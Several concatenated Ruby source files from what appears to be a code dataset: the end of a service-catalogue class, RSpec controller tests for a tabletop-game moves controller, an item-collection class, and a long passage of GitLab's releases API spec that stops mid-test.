  # Looks a service up in the catalogue by its UUID.
  def find_by_uuid(uuid)
    @logger.debug "NService.find_by_uuid(#{uuid})"
    service = @catalogue.find_by_uuid(uuid)
    @logger.debug "NService.find_by_uuid: #{service}"
    service
  end

  private

  # Catalogue records matching the descriptor's vendor/name/version triple.
  # NOTE(review): despite the `?` suffix this returns a collection, not a
  # boolean — callers rely on #any?; name kept for compatibility.
  def duplicated_service?(descriptor)
    @catalogue.find({'vendor'=>descriptor['vendor'], 'name'=>descriptor['name'], 'version'=>descriptor['version']})
  end
end
| 33.225 | 115 | 0.706546 |
0359fae6450ee6ccc6d2ec975034905f30a2612a | 8,338 | # frozen_string_literal: true
require 'rails_helper'
# Controller specs for MovesController: index filtering/sorting, show, the
# custom roll action (including "lucky" rolls), and standard CRUD actions.
RSpec.describe MovesController, type: :controller do
  # This should return the minimal set of attributes required to create a valid
  # Move. As you add validations to Move, be sure to
  # adjust the attributes here as well.
  let(:valid_attributes) do
    {
      type: 'Moves::Basic',
      name: 'Act Under Pressure',
      rating: 'cool',
      description: 'Description'
    }
  end

  let(:invalid_attributes) do
    {
      type: ''
    }
  end

  # This should return the minimal set of values that should be in the session
  # in order to pass any filters (e.g. authentication) defined in
  # MovesController. Be sure to keep this updated too.
  let(:valid_session) { {} }
  let(:user) { create :user }
  # Parsed JSON response body (memoized per example).
  let(:body) { JSON.parse(response.body) }

  before do
    sign_in user
  end

  describe 'GET #index' do
    subject(:get_index) do
      get :index,
          params: params,
          session: valid_session,
          format: format_type
    end

    let(:format_type) { :html }
    let(:params) { {} }

    it 'returns a success response' do
      Move.create! valid_attributes
      get_index
      expect(response).to be_successful
    end

    context 'with json format' do
      let(:format_type) { :json }

      render_views

      context 'sorted by type' do
        let!(:rollable_move) { create :moves_rollable }
        let!(:basic_move) { create :moves_basic }

        it 'is sorted by type' do
          get_index
          # The basic move's factory name comes first when sorted by type.
          expect(body.dig(0, "name")).to eq 'Act Under Pressure'
        end
      end

      context 'when playbook_id is supplied' do
        let(:playbook) { create :playbook }
        let(:params) { { playbook_id: playbook.id } }
        let!(:move) { create(:move, playbook: playbook) }
        let!(:another_pb_move) { create :move }

        it 'filters for moves associated with playbook' do
          get_index
          expect(body).to all(include('id' => move.id))
        end
      end

      context 'with a hunter' do
        let(:params) { { hunter_id: hunter.id } }
        let(:hunter) { create :hunter }
        let!(:move) { create :move }
        let!(:hunter_has_move) { create :move }

        before do
          hunter.moves << hunter_has_move
          hunter.save
        end

        it 'does not include moves the hunter does not have' do
          get_index
          expect(body.find { |json_move| json_move['id'] == move.id}).to be_nil
        end

        context ' when include_all_moves' do
          let(:params) { { hunter_id: hunter.id, include_all_moves: 'true' } }

          it 'does not include has_move' do
            get_index
            expect(body.find { |json_move| json_move['id'] == move.id}['has_move']).to be_falsey
          end
        end

        context 'when hunter has the move' do
          before { hunter.moves << move }

          it 'display if the hunter has the move' do
            get_index
            expect(body.dig(0, 'has_move')).to eq true
          end
        end
      end
    end
  end

  describe 'GET #show' do
    subject(:get_show) do
      get :show, params: params, session: valid_session, format: format_type
    end

    let(:move) { create :move }
    let(:params) { { id: move.to_param } }

    context 'when json format' do
      let(:format_type) { :json }

      render_views

      it 'returns a success response' do
        get_show
        expect(response).to be_successful
      end
    end
  end

  describe 'GET #roll' do
    subject(:get_roll) do
      get :roll, params: params, session: valid_session, format: format_type
    end

    let(:move) { create :move }
    let(:params) { { id: move.to_param } }
    # Override the outer `body` let: same parsed JSON, but with indifferent
    # access so symbol keys work below.
    let(:body) { super().with_indifferent_access }

    context 'when json format' do
      let(:format_type) { :json }

      render_views

      context 'when hunter is passed' do
        let(:params) { { id: move.to_param, hunter_id: hunter.id } }
        let(:hunter) { create :hunter }

        it 'includes results' do
          get_roll
          expect(body[:results]).to be_nil
          # TODO: error on unrollable move
        end

        context 'with a rollable move' do
          let(:move) { create :moves_rollable }

          it 'returns the results of rolling the move' do
            get_roll
            expect(body[:results]).to match(/Your total \d+ resulted in/)
          end

          context 'when lucky roll' do
            let(:params) do
              { id: move.to_param, hunter_id: hunter.id, lucky: true }
            end
            let(:hunter) { create :hunter, sharp: 1 }
            let(:move) { create :moves_rollable, rating: :sharp }

            it 'always rolls a 12' do
              get_roll
              # 13 = the forced 12 plus the hunter's sharp rating of 1.
              expect(body).to include(
                roll: 13,
                results: 'Your total 13 resulted in ten plus result'
              )
            end

            context 'when experience is lost' do
              let(:params) do
                {
                  id: move.to_param,
                  hunter_id: hunter.id,
                  lucky: true,
                  lose_experience: true
                }
              end

              it 'hunter loses the experience from failure' do
                get_roll
                expect(hunter.reload.experience).to eq(-1)
              end

              it 'hunter gets the best result' do
                get_roll
                expect(body).to include(
                  roll: 13,
                  results: 'Your total 13 resulted in ten plus result'
                )
              end
            end
          end
        end

        context 'with a basic move' do
          let(:move) { create :moves_basic }

          it 'returns the results of rolling the move' do
            get_roll
            expect(body[:results]).to match(/Your total \d+ resulted in/)
          end
        end
      end
    end
  end

  describe 'GET #new' do
    it 'returns a success response' do
      get :new, params: {}, session: valid_session
      expect(response).to be_successful
    end
  end

  describe 'GET #edit' do
    it 'returns a success response' do
      move = Move.create! valid_attributes
      get :edit, params: { id: move.to_param }, session: valid_session
      expect(response).to be_successful
    end
  end

  describe 'POST #create' do
    subject(:post_create) do
      post :create, params: { move: attributes }, session: valid_session
    end

    context 'with valid params' do
      let(:attributes) { valid_attributes }

      it 'creates a new Move' do
        expect { post_create }.to change(Move, :count).by(1)
      end

      it 'redirects to the created move' do
        post_create
        expect(response).to redirect_to(move_url(Move.last))
      end
    end

    context 'with invalid params' do
      let(:attributes) { invalid_attributes }

      it "returns a success response (i.e. to display the 'new' template)" do
        post_create
        expect(response).to be_successful
      end
    end
  end

  describe 'PUT #update' do
    subject(:put_update) do
      put :update,
          params: { id: move.to_param, move: new_attributes },
          session: valid_session
    end

    let!(:move) { create :move }

    context 'with valid params' do
      let(:new_attributes) do
        {
          name: 'New Move Name'
        }
      end

      it 'updates the requested move' do
        put_update
        expect(move.reload.name).to eq 'New Move Name'
      end

      it 'redirects to the move' do
        put_update
        expect(response).to redirect_to(move_url(move))
      end
    end

    context 'with invalid params' do
      let(:new_attributes) { invalid_attributes }

      it "returns a success response (i.e. to display the 'edit' template)" do
        put_update
        expect(response).to be_successful
      end
    end
  end

  describe 'DELETE #destroy' do
    subject(:delete_destroy) do
      delete :destroy, params: { id: move.to_param }, session: valid_session
    end

    let!(:move) { create :move }

    it 'destroys the requested move' do
      expect { delete_destroy }.to change(Move, :count).by(-1)
    end

    it 'redirects to the moves list' do
      delete_destroy
      expect(response).to redirect_to(moves_url)
    end
  end
end
| 26.469841 | 96 | 0.573399 |
1abe89444b0c5e25a100f55aa0f9016a8cc70061 | 705 | module Haversack
class ItemCollection < Array
def initialize(data, &block)
if !block_given?
raise ArgumentError, "expected #{data} to contain only elements of class Haversack::Item" unless data.is_a?(Array) && ItemCollection.only_items?(data)
end
@size = self.size
@weight = self.weight
block_given? ? super(data, block) : super(data)
end
def size
map(&:size).sum
end
def weight
map(&:weight).sum
end
def push(obj)
raise Haversack::KnapsackContentError unless obj.is_a? Haversack::Item
super
end
def self.only_items?(data)
data.all? { |el| el.is_a? Haversack::Item }
end
end
end
| 20.735294 | 158 | 0.624113 |
03e0954e5ab3f2c05c5adee6d4689d59628ec6c3 | 45,609 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe API::Releases do
let(:project) { create(:project, :repository, :private) }
let(:maintainer) { create(:user) }
let(:reporter) { create(:user) }
let(:developer) { create(:user) }
let(:guest) { create(:user) }
let(:non_project_member) { create(:user) }
let(:commit) { create(:commit, project: project) }
before do
project.add_maintainer(maintainer)
project.add_reporter(reporter)
project.add_guest(guest)
project.add_developer(developer)
end
describe 'GET /projects/:id/releases', :use_clean_rails_redis_caching do
context 'when there are two releases' do
let!(:release_1) do
create(:release,
project: project,
tag: 'v0.1',
author: maintainer,
released_at: 2.days.ago)
end
let!(:release_2) do
create(:release,
project: project,
tag: 'v0.2',
author: maintainer,
released_at: 1.day.ago)
end
it 'returns 200 HTTP status' do
get api("/projects/#{project.id}/releases", maintainer)
expect(response).to have_gitlab_http_status(:ok)
end
it 'returns releases ordered by released_at' do
get api("/projects/#{project.id}/releases", maintainer)
expect(json_response.count).to eq(2)
expect(json_response.first['tag_name']).to eq(release_2.tag)
expect(json_response.second['tag_name']).to eq(release_1.tag)
end
it 'does not include description_html' do
get api("/projects/#{project.id}/releases", maintainer)
expect(json_response.map { |h| h['description_html'] }).to contain_exactly(nil, nil)
end
RSpec.shared_examples 'release sorting' do |order_by|
subject { get api(url, access_level), params: { sort: sort, order_by: order_by } }
context "sorting by #{order_by}" do
context 'ascending order' do
let(:sort) { 'asc' }
it 'returns the sorted releases' do
subject
expect(json_response.map { |release| release['name'] }).to eq(releases.map(&:name))
end
end
context 'descending order' do
let(:sort) { 'desc' }
it 'returns the sorted releases' do
subject
expect(json_response.map { |release| release['name'] }).to eq(releases.reverse.map(&:name))
end
end
end
end
context 'return releases in sorted order' do
before do
release_2.update_attribute(:created_at, 3.days.ago)
end
let(:url) { "/projects/#{project.id}/releases" }
let(:access_level) { maintainer }
it_behaves_like 'release sorting', 'released_at' do
let(:releases) { [release_1, release_2] }
end
it_behaves_like 'release sorting', 'created_at' do
let(:releases) { [release_2, release_1] }
end
end
it 'matches response schema' do
get api("/projects/#{project.id}/releases", maintainer)
expect(response).to match_response_schema('public_api/v4/releases')
end
it 'returns rendered helper paths' do
get api("/projects/#{project.id}/releases", maintainer)
expect(json_response.first['commit_path']).to eq("/#{release_2.project.full_path}/-/commit/#{release_2.commit.id}")
expect(json_response.first['tag_path']).to eq("/#{release_2.project.full_path}/-/tags/#{release_2.tag}")
expect(json_response.second['commit_path']).to eq("/#{release_1.project.full_path}/-/commit/#{release_1.commit.id}")
expect(json_response.second['tag_path']).to eq("/#{release_1.project.full_path}/-/tags/#{release_1.tag}")
end
context 'when include_html_description option is true' do
it 'includes description_html field' do
get api("/projects/#{project.id}/releases", maintainer), params: { include_html_description: true }
expect(json_response.map { |h| h['description_html'] })
.to contain_exactly(instance_of(String), instance_of(String))
end
end
end
it 'returns an upcoming_release status for a future release' do
tomorrow = Time.now.utc + 1.day
create(:release, project: project, tag: 'v0.1', author: maintainer, released_at: tomorrow)
get api("/projects/#{project.id}/releases", maintainer)
expect(response).to have_gitlab_http_status(:ok)
expect(json_response.first['upcoming_release']).to eq(true)
end
it 'returns an upcoming_release status for a past release' do
yesterday = Time.now.utc - 1.day
create(:release, project: project, tag: 'v0.1', author: maintainer, released_at: yesterday)
get api("/projects/#{project.id}/releases", maintainer)
expect(response).to have_gitlab_http_status(:ok)
expect(json_response.first['upcoming_release']).to eq(false)
end
it 'avoids N+1 queries', :use_sql_query_cache do
create(:release, :with_evidence, project: project, tag: 'v0.1', author: maintainer)
create(:release_link, release: project.releases.first)
control_count = ActiveRecord::QueryRecorder.new(skip_cached: false) do
get api("/projects/#{project.id}/releases", maintainer)
end.count
create_list(:release, 2, :with_evidence, project: project, tag: 'v0.1', author: maintainer)
create_list(:release, 2, project: project)
create_list(:release_link, 2, release: project.releases.first)
create_list(:release_link, 2, release: project.releases.last)
expect do
get api("/projects/#{project.id}/releases", maintainer)
end.not_to exceed_all_query_limit(control_count)
end
it 'serializes releases for the first time and read cached data from the second time' do
create_list(:release, 2, project: project)
expect(API::Entities::Release)
.to receive(:represent).with(instance_of(Release), any_args)
.twice
5.times { get api("/projects/#{project.id}/releases", maintainer) }
end
it 'increments the cache key when link is updated' do
releases = create_list(:release, 2, project: project)
expect(API::Entities::Release)
.to receive(:represent).with(instance_of(Release), any_args)
.exactly(4).times
2.times { get api("/projects/#{project.id}/releases", maintainer) }
releases.each { |release| create(:release_link, release: release) }
3.times { get api("/projects/#{project.id}/releases", maintainer) }
end
it 'increments the cache key when evidence is updated' do
releases = create_list(:release, 2, project: project)
expect(API::Entities::Release)
.to receive(:represent).with(instance_of(Release), any_args)
.exactly(4).times
2.times { get api("/projects/#{project.id}/releases", maintainer) }
releases.each { |release| create(:evidence, release: release) }
3.times { get api("/projects/#{project.id}/releases", maintainer) }
end
context 'when tag does not exist in git repository' do
let!(:release) { create(:release, project: project, tag: 'v1.1.5') }
it 'returns the tag' do
get api("/projects/#{project.id}/releases", maintainer)
expect(json_response.count).to eq(1)
expect(json_response.first['tag_name']).to eq('v1.1.5')
expect(release).to be_tag_missing
end
end
context 'when tag contains a slash' do
let!(:release) { create(:release, project: project, tag: 'debian/2.4.0-1', description: "debian/2.4.0-1") }
it 'returns 200 HTTP status' do
get api("/projects/#{project.id}/releases", maintainer)
expect(response).to have_gitlab_http_status(:ok)
end
end
context 'when user is a guest' do
let!(:release) do
create(:release,
project: project,
tag: 'v0.1',
author: maintainer,
created_at: 2.days.ago)
end
it 'responds 200 OK' do
get api("/projects/#{project.id}/releases", guest)
expect(response).to have_gitlab_http_status(:ok)
end
it "does not expose tag, commit, source code or helper paths" do
get api("/projects/#{project.id}/releases", guest)
expect(response).to match_response_schema('public_api/v4/release/releases_for_guest')
expect(json_response[0]['assets']['count']).to eq(release.links.count)
expect(json_response[0]['commit_path']).to be_nil
expect(json_response[0]['tag_path']).to be_nil
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'responds 200 OK' do
get api("/projects/#{project.id}/releases", guest)
expect(response).to have_gitlab_http_status(:ok)
end
it "exposes tag, commit, source code and helper paths" do
get api("/projects/#{project.id}/releases", guest)
expect(response).to match_response_schema('public_api/v4/releases')
expect(json_response.first['assets']['count']).to eq(release.links.count + release.sources.count)
expect(json_response.first['commit_path']).to eq("/#{release.project.full_path}/-/commit/#{release.commit.id}")
expect(json_response.first['tag_path']).to eq("/#{release.project.full_path}/-/tags/#{release.tag}")
end
end
end
context 'when user is not a project member' do
it 'cannot find the project' do
get api("/projects/#{project.id}/releases", non_project_member)
expect(response).to have_gitlab_http_status(:not_found)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'allows the request' do
get api("/projects/#{project.id}/releases", non_project_member)
expect(response).to have_gitlab_http_status(:ok)
end
end
end
context 'when releases are public and request user is absent' do
let(:project) { create(:project, :repository, :public) }
it 'returns the releases' do
create(:release, project: project, tag: 'v0.1')
get api("/projects/#{project.id}/releases")
expect(response).to have_gitlab_http_status(:ok)
expect(json_response.count).to eq(1)
expect(json_response.first['tag_name']).to eq('v0.1')
end
end
end
describe 'GET /projects/:id/releases/:tag_name' do
context 'when there is a release' do
let!(:release) do
create(:release,
project: project,
tag: 'v0.1',
sha: commit.id,
author: maintainer,
description: 'This is v0.1')
end
it 'returns 200 HTTP status' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(response).to have_gitlab_http_status(:ok)
end
it 'returns a release entry' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['tag_name']).to eq(release.tag)
expect(json_response['description']).to eq('This is v0.1')
expect(json_response['author']['name']).to eq(maintainer.name)
expect(json_response['commit']['id']).to eq(commit.id)
expect(json_response['assets']['count']).to eq(4)
expect(json_response['commit_path']).to eq("/#{release.project.full_path}/-/commit/#{release.commit.id}")
expect(json_response['tag_path']).to eq("/#{release.project.full_path}/-/tags/#{release.tag}")
end
it 'matches response schema' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(response).to match_response_schema('public_api/v4/release')
end
it 'contains source information as assets' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['assets']['sources'].map { |h| h['format'] })
.to match_array(release.sources.map(&:format))
expect(json_response['assets']['sources'].map { |h| h['url'] })
.to match_array(release.sources.map(&:url))
end
it 'does not include description_html' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['description_html']).to eq(nil)
end
context 'with evidence' do
let!(:evidence) { create(:evidence, release: release) }
it 'returns the evidence' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['evidences'].count).to eq(1)
end
it '#collected_at' do
travel_to(Time.now.round) do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['evidences'].first['collected_at'].to_datetime.to_i).to be_within(1.minute).of(release.evidences.first.created_at.to_i)
end
end
end
context 'when release is associated to mutiple milestones' do
context 'milestones order' do
let_it_be(:project) { create(:project, :repository, :public) }
let_it_be_with_reload(:release_with_milestones) { create(:release, tag: 'v3.14', project: project) }
let(:actual_milestone_title_order) do
get api("/projects/#{project.id}/releases/#{release_with_milestones.tag}", non_project_member)
json_response['milestones'].map { |m| m['title'] }
end
before do
release_with_milestones.update!(milestones: [milestone_2, milestone_1])
end
it_behaves_like 'correct release milestone order'
end
end
context 'when release has link asset' do
let!(:link) do
create(:release_link,
release: release,
name: 'release-18.04.dmg',
url: url)
end
let(:url) { 'https://my-external-hosting.example.com/scrambled-url/app.zip' }
it 'contains link information as assets' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['assets']['links'].count).to eq(1)
expect(json_response['assets']['links'].first['id']).to eq(link.id)
expect(json_response['assets']['links'].first['name'])
.to eq('release-18.04.dmg')
expect(json_response['assets']['links'].first['url'])
.to eq('https://my-external-hosting.example.com/scrambled-url/app.zip')
expect(json_response['assets']['links'].first['external'])
.to be_truthy
end
context 'when link is internal' do
let(:url) do
"#{project.web_url}/-/jobs/artifacts/v11.6.0-rc4/download?" \
"job=rspec-mysql+41%2F50"
end
it 'has external false' do
get api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(json_response['assets']['links'].first['external'])
.to be_falsy
end
end
end
context 'when include_html_description option is true' do
it 'includes description_html field' do
get api("/projects/#{project.id}/releases/v0.1", maintainer), params: { include_html_description: true }
expect(json_response['description_html']).to be_instance_of(String)
end
end
context 'when user is a guest' do
it 'responds 403 Forbidden' do
get api("/projects/#{project.id}/releases/v0.1", guest)
expect(response).to have_gitlab_http_status(:forbidden)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'responds 200 OK' do
get api("/projects/#{project.id}/releases/v0.1", guest)
expect(response).to have_gitlab_http_status(:ok)
end
it "exposes tag and commit" do
create(:release,
project: project,
tag: 'v0.1',
author: maintainer,
created_at: 2.days.ago)
get api("/projects/#{project.id}/releases/v0.1", guest)
expect(response).to match_response_schema('public_api/v4/release')
end
end
end
end
context 'when specified tag is not found in the project' do
it 'returns 404 for maintater' do
get api("/projects/#{project.id}/releases/non_exist_tag", maintainer)
expect(response).to have_gitlab_http_status(:not_found)
expect(json_response['message']).to eq('404 Not Found')
end
it 'returns project not found for no user' do
get api("/projects/#{project.id}/releases/non_exist_tag", nil)
expect(response).to have_gitlab_http_status(:not_found)
expect(json_response['message']).to eq('404 Project Not Found')
end
it 'returns forbidden for guest' do
get api("/projects/#{project.id}/releases/non_existing_tag", guest)
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is not a project member' do
let!(:release) { create(:release, tag: 'v0.1', project: project) }
it 'cannot find the project' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(response).to have_gitlab_http_status(:not_found)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'allows the request' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(response).to have_gitlab_http_status(:ok)
end
context 'when release is associated to a milestone' do
let!(:release) do
create(:release, tag: 'v0.1', project: project, milestones: [milestone])
end
let(:milestone) { create(:milestone, project: project) }
it 'matches schema' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(response).to match_response_schema('public_api/v4/release')
end
it 'exposes milestones' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(json_response['milestones'].first['title']).to eq(milestone.title)
end
it 'returns issue stats for milestone' do
create_list(:issue, 2, milestone: milestone, project: project)
create_list(:issue, 3, :closed, milestone: milestone, project: project)
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
issue_stats = json_response['milestones'].first["issue_stats"]
expect(issue_stats["total"]).to eq(5)
expect(issue_stats["closed"]).to eq(3)
end
context 'when project restricts visibility of issues and merge requests' do
let!(:project) { create(:project, :repository, :public, :issues_private, :merge_requests_private) }
it 'does not expose milestones' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(json_response['milestones']).to be_nil
end
end
context 'when project restricts visibility of issues' do
let!(:project) { create(:project, :repository, :public, :issues_private) }
it 'exposes milestones' do
get api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(json_response['milestones'].first['title']).to eq(milestone.title)
end
end
end
end
end
end
describe 'POST /projects/:id/releases' do
let(:params) do
{
name: 'New release',
tag_name: 'v0.1',
description: 'Super nice release',
assets: {
links: [
{
name: 'An example runbook link',
url: 'https://example.com/runbook',
link_type: 'runbook',
filepath: '/permanent/path/to/runbook'
}
]
}
}
end
before do
initialize_tags
end
it 'accepts the request' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:created)
end
it 'creates a new release' do
expect do
post api("/projects/#{project.id}/releases", maintainer), params: params
end.to change { Release.count }.by(1)
release = project.releases.last
aggregate_failures do
expect(release.name).to eq('New release')
expect(release.tag).to eq('v0.1')
expect(release.description).to eq('Super nice release')
expect(release.links.last.name).to eq('An example runbook link')
expect(release.links.last.url).to eq('https://example.com/runbook')
expect(release.links.last.link_type).to eq('runbook')
expect(release.links.last.filepath).to eq('/permanent/path/to/runbook')
end
end
it 'creates a new release without description' do
params = {
name: 'New release without description',
tag_name: 'v0.1',
released_at: '2019-03-25 10:00:00'
}
expect do
post api("/projects/#{project.id}/releases", maintainer), params: params
end.to change { Release.count }.by(1)
expect(project.releases.last.name).to eq('New release without description')
expect(project.releases.last.tag).to eq('v0.1')
expect(project.releases.last.description).to eq(nil)
end
it 'sets the released_at to the current time if the released_at parameter is not provided' do
now = Time.zone.parse('2015-08-25 06:00:00Z')
travel_to(now) do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(project.releases.last.released_at).to eq(now)
end
end
it 'sets the released_at to the value in the parameters if specified' do
params = {
name: 'New release',
tag_name: 'v0.1',
description: 'Super nice release',
released_at: '2019-03-20T10:00:00Z'
}
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(project.releases.last.released_at).to eq('2019-03-20T10:00:00Z')
end
it 'assumes the utc timezone for released_at if the timezone is not provided' do
params = {
name: 'New release',
tag_name: 'v0.1',
description: 'Super nice release',
released_at: '2019-03-25 10:00:00'
}
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(project.releases.last.released_at).to eq('2019-03-25T10:00:00Z')
end
it 'allows specifying a released_at with a local time zone' do
params = {
name: 'New release',
tag_name: 'v0.1',
description: 'Super nice release',
released_at: '2019-03-25T10:00:00+09:00'
}
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(project.releases.last.released_at).to eq('2019-03-25T01:00:00Z')
end
it 'matches response schema' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to match_response_schema('public_api/v4/release')
end
it 'does not create a new tag' do
expect do
post api("/projects/#{project.id}/releases", maintainer), params: params
end.not_to change { Project.find_by_id(project.id).repository.tag_count }
end
context 'with protected tag' do
context 'when user has access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :developers_can_create, name: '*', project: project) }
it 'accepts the request' do
post api("/projects/#{project.id}/releases", developer), params: params
expect(response).to have_gitlab_http_status(:created)
end
end
context 'when user does not have access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :maintainers_can_create, name: '*', project: project) }
it 'forbids the request' do
post api("/projects/#{project.id}/releases", developer), params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
context 'when user is a reporter' do
it 'forbids the request' do
post api("/projects/#{project.id}/releases", reporter), params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is not a project member' do
it 'forbids the request' do
post api("/projects/#{project.id}/releases", non_project_member),
params: params
expect(response).to have_gitlab_http_status(:not_found)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'forbids the request' do
post api("/projects/#{project.id}/releases", non_project_member),
params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when create assets altogether' do
let(:base_params) do
{
name: 'New release',
tag_name: 'v0.1',
description: 'Super nice release'
}
end
context 'when create one asset' do
let(:params) do
base_params.merge({
assets: {
links: [{ name: 'beta', url: 'https://dosuken.example.com/inspection.exe' }]
}
})
end
it 'accepts the request' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:created)
end
it 'creates an asset with specified parameters' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(json_response['assets']['links'].count).to eq(1)
expect(json_response['assets']['links'].first['name']).to eq('beta')
expect(json_response['assets']['links'].first['url'])
.to eq('https://dosuken.example.com/inspection.exe')
end
it 'matches response schema' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to match_response_schema('public_api/v4/release')
end
end
context 'when creating two assets' do
let(:params) do
base_params.merge({
assets: {
links: [
{ name: 'alpha', url: 'https://dosuken.example.com/alpha.exe' },
{ name: 'beta', url: 'https://dosuken.example.com/beta.exe' }
]
}
})
end
it 'creates two assets with specified parameters' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(json_response['assets']['links'].count).to eq(2)
expect(json_response['assets']['links'].map { |h| h['name'] })
.to match_array(%w[alpha beta])
expect(json_response['assets']['links'].map { |h| h['url'] })
.to match_array(%w[https://dosuken.example.com/alpha.exe
https://dosuken.example.com/beta.exe])
end
context 'when link names are duplicates' do
let(:params) do
base_params.merge({
assets: {
links: [
{ name: 'alpha', url: 'https://dosuken.example.com/alpha.exe' },
{ name: 'alpha', url: 'https://dosuken.example.com/beta.exe' }
]
}
})
end
it 'recognizes as a bad request' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:bad_request)
end
end
end
end
end
context 'when using JOB-TOKEN auth' do
let(:job) { create(:ci_build, user: maintainer, project: project) }
let(:params) do
{
name: 'Another release',
tag_name: 'v0.2',
description: 'Another nice release',
released_at: '2019-04-25T10:00:00+09:00'
}
end
context 'when no token is provided' do
it 'returns a :not_found error' do
post api("/projects/#{project.id}/releases"), params: params
expect(response).to have_gitlab_http_status(:not_found)
end
end
context 'when an invalid token is provided' do
it 'returns an :unauthorized error' do
post api("/projects/#{project.id}/releases"), params: params.merge(job_token: 'yadayadayada')
expect(response).to have_gitlab_http_status(:unauthorized)
end
end
context 'when a valid token is provided' do
it 'creates the release for a running job' do
job.update!(status: :running)
post api("/projects/#{project.id}/releases"), params: params.merge(job_token: job.token)
expect(response).to have_gitlab_http_status(:created)
expect(project.releases.last.description).to eq('Another nice release')
end
it 'returns an :unauthorized error for a completed job' do
job.success!
post api("/projects/#{project.id}/releases"), params: params.merge(job_token: job.token)
expect(response).to have_gitlab_http_status(:unauthorized)
end
end
end
context 'when tag does not exist in git repository' do
let(:params) do
{
name: 'Android ~ Ice Cream Sandwich ~',
tag_name: tag_name,
description: 'Android 4.0–4.0.4 "Ice Cream Sandwich" is the ninth' \
'version of the Android mobile operating system developed' \
'by Google.',
ref: 'master'
}
end
let(:tag_name) { 'v4.0' }
it 'creates a new tag' do
expect do
post api("/projects/#{project.id}/releases", maintainer), params: params
end.to change { Project.find_by_id(project.id).repository.tag_count }.by(1)
expect(project.repository.find_tag('v4.0').dereferenced_target.id)
.to eq(project.repository.commit('master').id)
end
it 'creates a new release' do
expect do
post api("/projects/#{project.id}/releases", maintainer), params: params
end.to change { Release.count }.by(1)
expect(project.releases.last.name).to eq('Android ~ Ice Cream Sandwich ~')
expect(project.releases.last.tag).to eq('v4.0')
expect(project.releases.last.description).to eq(
'Android 4.0–4.0.4 "Ice Cream Sandwich" is the ninth' \
'version of the Android mobile operating system developed' \
'by Google.')
end
context 'when tag name is HEAD' do
let(:tag_name) { 'HEAD' }
it 'returns a 400 error as failure on tag creation' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:bad_request)
expect(json_response['message']).to eq('Tag name invalid')
end
end
context 'when tag name is empty' do
let(:tag_name) { '' }
it 'returns a 400 error as failure on tag creation' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:bad_request)
expect(json_response['message']).to eq('Tag name invalid')
end
end
end
context 'when release already exists' do
before do
create(:release, project: project, tag: 'v0.1', name: 'New release')
end
it 'returns an error as conflicted request' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:conflict)
end
end
context 'with milestones' do
let(:subject) { post api("/projects/#{project.id}/releases", maintainer), params: params }
let(:milestone) { create(:milestone, project: project, title: 'v1.0') }
let(:returned_milestones) { json_response['milestones'].map {|m| m['title']} }
before do
params.merge!(milestone_params)
subject
end
context 'with a project milestone' do
let(:milestone_params) { { milestones: [milestone.title] } }
it 'adds the milestone' do
expect(response).to have_gitlab_http_status(:created)
expect(returned_milestones).to match_array(['v1.0'])
end
end
context 'with multiple milestones' do
let(:milestone2) { create(:milestone, project: project, title: 'm2') }
let(:milestone_params) { { milestones: [milestone.title, milestone2.title] } }
it 'adds all milestones' do
expect(response).to have_gitlab_http_status(:created)
expect(returned_milestones).to match_array(['v1.0', 'm2'])
end
end
context 'with an empty milestone' do
let(:milestone_params) { { milestones: [] } }
it 'removes all milestones' do
expect(response).to have_gitlab_http_status(:created)
expect(json_response['milestones']).to be_nil
end
end
context 'with a non-existant milestone' do
let(:milestone_params) { { milestones: ['xyz'] } }
it 'returns a 400 error as milestone not found' do
expect(response).to have_gitlab_http_status(:bad_request)
expect(json_response['message']).to eq("Milestone(s) not found: xyz")
end
end
context 'with a milestone from a different project' do
let(:milestone) { create(:milestone, title: 'v1.0') }
let(:milestone_params) { { milestones: [milestone.title] } }
it 'returns a 400 error as milestone not found' do
expect(response).to have_gitlab_http_status(:bad_request)
